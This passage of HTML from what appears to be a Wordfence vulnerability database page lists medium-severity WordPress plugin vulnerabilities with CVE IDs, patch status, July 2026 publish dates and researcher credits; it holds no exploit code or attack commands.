<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-polls" target="_blank" rel="noopener">WP-Polls</a> <span class="wfvr-software-slug">[wp-polls]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/japaneseknotweed" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/1583c4af4ebd2ced2e51f0239cd87d35.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="1583c4af4ebd2ced2e51f0239cd87d35"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/japaneseknotweed" target="_blank" rel="noopener">japaneseknotweed</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/541dae6d-209b-4216-ab7a-ddcd71a322cb" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0748838a-191a-4dde-80c9-7898c1de6adc" target="_blank" rel="noopener">Advanced Views – Display Custom Fields (ACF, Pods, MetaBox), Posts, CPT and Woo Products anywhere in Gutenberg, Elementor, Divi, Beaver… &lt;= 3.8.11 &#8211; Authenticated (Subscriber+) Remote Code Execution</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-59543" target="_blank" rel="noopener noreferrer">							CVE-2026-59543						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 22, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/acf-views" target="_blank" rel="noopener">Advanced Views – Display Custom Fields (ACF, Pods, MetaBox), Posts, CPT and Woo Products anywhere in Gutenberg, Elementor, Divi, Beaver…</a> <span class="wfvr-software-slug">[acf-views]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nguyen-ba-khanh-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/851f04ad769b87bcc7fe5afe8300abd1.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="851f04ad769b87bcc7fe5afe8300abd1"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nguyen-ba-khanh-2" target="_blank" rel="noopener">Nguyen Ba Khanh</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0748838a-191a-4dde-80c9-7898c1de6adc" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ea89d3ed-b0c7-40fb-8c9f-cfa0028fa6c2" target="_blank" rel="noopener">Avada Core &lt;= 5.15.6 &#8211; Cross-Site Request Forgery</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65471" target="_blank" rel="noopener noreferrer">							CVE-2026-65471						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 22, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/fusion-core" target="_blank" rel="noopener">Avada Core</a> <span class="wfvr-software-slug">[fusion-core]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/luis-koleski" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/cacf4ee88693364dcf8ccac51b575d6b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="cacf4ee88693364dcf8ccac51b575d6b"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/luis-koleski" target="_blank" rel="noopener">Luis Koleski</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ea89d3ed-b0c7-40fb-8c9f-cfa0028fa6c2" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/383a9771-1128-4993-bfb8-443ed26804fd" target="_blank" rel="noopener">Avada Custom Branding &lt;= 1.2 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65524" target="_blank" rel="noopener noreferrer">							CVE-2026-65524						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 23, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/fusion-white-label-branding" target="_blank" rel="noopener">Avada Custom Branding</a> <span class="wfvr-software-slug">[fusion-white-label-branding]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/bonds" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/bonds" target="_blank" rel="noopener">Bonds</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/383a9771-1128-4993-bfb8-443ed26804fd" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1e72fd72-9771-442c-86d9-5dcc21df6c09" target="_blank" rel="noopener">Cyr to Lat Reloaded – Transliteration of Links and File Names &lt;= 1.3.3 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65537" target="_blank" rel="noopener noreferrer">							CVE-2026-65537						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 23, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/cyr-and-lat" target="_blank" rel="noopener">Cyr to Lat Reloaded – Transliteration of Links and File Names</a> <span class="wfvr-software-slug">[cyr-and-lat]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1e72fd72-9771-442c-86d9-5dcc21df6c09" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0a03184e-ab6f-4a71-9f1e-2bbe9a8b299e" target="_blank" rel="noopener">Directory Listings WordPress plugin – uListing &lt;= 2.2.0 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-27392" target="_blank" rel="noopener noreferrer">							CVE-2026-27392						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 22, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ulisting" target="_blank" rel="noopener">Directory Listings WordPress plugin – uListing</a> <span class="wfvr-software-slug">[ulisting]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/7965cd13376a540548ec7009cd66b05b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="7965cd13376a540548ec7009cd66b05b"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener">daroo</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0a03184e-ab6f-4a71-9f1e-2bbe9a8b299e" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/fbfcb3c5-23f7-409a-a8db-92c4b714ba6a" target="_blank" rel="noopener">Directory Listings WordPress plugin – uListing &lt;= 2.2.0 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-27391" target="_blank" rel="noopener noreferrer">							CVE-2026-27391						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 22, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ulisting" target="_blank" rel="noopener">Directory Listings WordPress plugin – uListing</a> <span class="wfvr-software-slug">[ulisting]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/7965cd13376a540548ec7009cd66b05b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="7965cd13376a540548ec7009cd66b05b"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener">daroo</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/fbfcb3c5-23f7-409a-a8db-92c4b714ba6a" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/67b7c2b5-c8ef-4659-b9e8-4c695bb76bff" target="_blank" rel="noopener">eRoom – Webinar &amp; Meeting Plugin for Zoom, Google Meet, Microsoft Teams &lt;= 1.7.1 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-25427" target="_blank" rel="noopener noreferrer">							CVE-2026-25427						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 22, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/eroom-zoom-meetings-webinar" target="_blank" rel="noopener">eRoom – Webinar &amp; Meeting Plugin for Zoom, Google Meet, Microsoft Teams</a> <span class="wfvr-software-slug">[eroom-zoom-meetings-webinar]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nabil-irawan" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/86a1429aeb8e473ec62cf8dd3d4e4571.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="86a1429aeb8e473ec62cf8dd3d4e4571"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nabil-irawan" target="_blank" rel="noopener">Nabil Irawan</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/67b7c2b5-c8ef-4659-b9e8-4c695bb76bff" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/928dd5c1-c396-4ddb-b910-697884dbc824" target="_blank" rel="noopener">GiveWP – Donation Plugin and Fundraising Platform &lt;= 4.16.3 &#8211; Cross-Site Request Forgery</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65464" target="_blank" rel="noopener noreferrer">							CVE-2026-65464						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 22, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/give" target="_blank" rel="noopener">GiveWP – Donation Plugin and Fundraising Platform</a> <span class="wfvr-software-slug">[give]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jh-hack" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jh-hack" target="_blank" rel="noopener">jh_hack</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/928dd5c1-c396-4ddb-b910-697884dbc824" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1d8c53cd-c35e-44db-8e61-da8f02ee6025" target="_blank" rel="noopener">Kwayy HTML Sitemap &lt;= 4.0 &#8211; Cross-Site Request Forgery</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65539" target="_blank" rel="noopener noreferrer">							CVE-2026-65539						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 23, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/kwayy-html-sitemap" target="_blank" rel="noopener">Kwayy HTML Sitemap</a> <span class="wfvr-software-slug">[kwayy-html-sitemap]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1d8c53cd-c35e-44db-8e61-da8f02ee6025" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/f4e2f6a8-0576-4a43-9061-9878b7d59399" target="_blank" rel="noopener">LA-Studio Element Kit for Elementor &lt;= 1.6.2 &#8211; Cross-Site Request Forgery</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65488" target="_blank" rel="noopener noreferrer">							CVE-2026-65488						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 22, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/lastudio-element-kit" target="_blank" rel="noopener">LA-Studio Element Kit for Elementor</a> <span class="wfvr-software-slug">[lastudio-element-kit]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/steven-julian" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/steven-julian" target="_blank" rel="noopener">Steven Julian</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/f4e2f6a8-0576-4a43-9061-9878b7d59399" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/6bceb15e-0727-4bd5-b4e7-f2c1f2f3ef51" target="_blank" rel="noopener">License Manager for WooCommerce &lt;= 3.0.17 &#8211; Authenticated (Customer+) Arbitrary Content Deletion</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-61958" target="_blank" rel="noopener noreferrer">							CVE-2026-61958						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 21, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/license-manager-for-woocommerce" target="_blank" rel="noopener">License Manager for WooCommerce</a> <span class="wfvr-software-slug">[license-manager-for-woocommerce]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/winis" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/a692e64baa9a1b2bf3d84c04518113ce.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="a692e64baa9a1b2bf3d84c04518113ce"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/winis" target="_blank" rel="noopener">WiniS</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/6bceb15e-0727-4bd5-b4e7-f2c1f2f3ef51" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d834eb3a-e887-40df-b61d-56ba32048aa3" target="_blank" rel="noopener">ListingPro Plugin &lt;= 2.9.10 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65478" target="_blank" rel="noopener noreferrer">							CVE-2026-65478						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 22, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/listingpro-plugin" target="_blank" rel="noopener">ListingPro Plugin</a> <span class="wfvr-software-slug">[listingpro-plugin]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/phat-rio" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/69c5e2969d579d1351243832fa879b61.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="69c5e2969d579d1351243832fa879b61"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/phat-rio" target="_blank" rel="noopener">Phat RiO</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d834eb3a-e887-40df-b61d-56ba32048aa3" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/8e1371a5-ed2e-4a1b-901e-8aef4d0d3acf" target="_blank" rel="noopener">MailPoet – Newsletters, Email Marketing, and Automation  5.30.0-5.33.0 &#8211; Cross-Site Request Forgery</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-57626" target="_blank" rel="noopener noreferrer">							CVE-2026-57626						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 21, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/mailpoet" target="_blank" rel="noopener">MailPoet – Newsletters, Email Marketing, and Automation</a> <span class="wfvr-software-slug">[mailpoet]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nguyen-ba-khanh-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/851f04ad769b87bcc7fe5afe8300abd1.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="851f04ad769b87bcc7fe5afe8300abd1"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nguyen-ba-khanh-2" target="_blank" rel="noopener">Nguyen Ba Khanh</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/8e1371a5-ed2e-4a1b-901e-8aef4d0d3acf" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/67ff1f6e-0bea-4e09-ac3d-727d13fcbfa1" target="_blank" rel="noopener">Masteriyo LMS – LMS Course Builder, Quizzes &amp; Certificates &lt;= 2.3.1 &#8211; Authenticated (Subscriber+) Insecure Direct Object Reference</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65463" target="_blank" rel="noopener noreferrer">							CVE-2026-65463						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 22, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
